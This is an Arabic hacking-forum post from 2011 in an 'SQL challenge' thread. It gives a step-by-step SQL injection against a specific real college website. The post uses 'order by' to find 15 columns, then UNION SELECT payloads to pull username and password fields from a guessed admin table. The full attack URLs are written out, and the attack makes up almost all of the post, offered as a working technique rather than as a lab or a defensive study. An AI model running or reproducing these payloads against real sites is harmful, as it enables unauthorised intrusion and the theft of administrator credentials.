الموضوع: {SQL}تحدي SQL
عرض مشاركة واحدة
قديم 10-05-2011, 10:11 PM   رقم المشاركة : 32 (permalink)
معلومات العضو
aircrack -ng
 
الصورة الرمزية aircrack -ng
 

 

 
إحصائية العضو







aircrack -ng غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 21
aircrack -ng is on a distinguished road

افتراضي رد: {SQL}تحدي SQL


نعطي لمحه على هالنوع من الحقن
هون نستعمل الامر order by عادي
طيب طلع معانا 15 عمود

كود:
http://www.galilcol.ac.il/page.asp?id=17 order by 15
المرحله التانيه لازم نستعمل التخمين عشان تظهر الاعمده المصابه مثلا انا خمنت شوي ومانفع المهم نخمن مثلا هيك
كود:
http://www.galilcol.ac.il/page.asp?id=17 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+administratour
نفرض انو طلع معانا العمود المصاب 5 مكان العمود المصاب نجرب نخمن مثلا password وكمان username

مثلا

كود:
http://www.galilcol.ac.il/page.asp?id=17 UNION SELECT 1,2,3,4,password,6,7,8,9,10,11,12,13,14,15+from+administratour
هذا مجرد مثال
التوقيع

الموت ياتي بغته والقبر صندوق العمل


http://www.tvquran.com/


(من تواضع لله رفع)



vbspiders team

 

   

رد مع اقتباس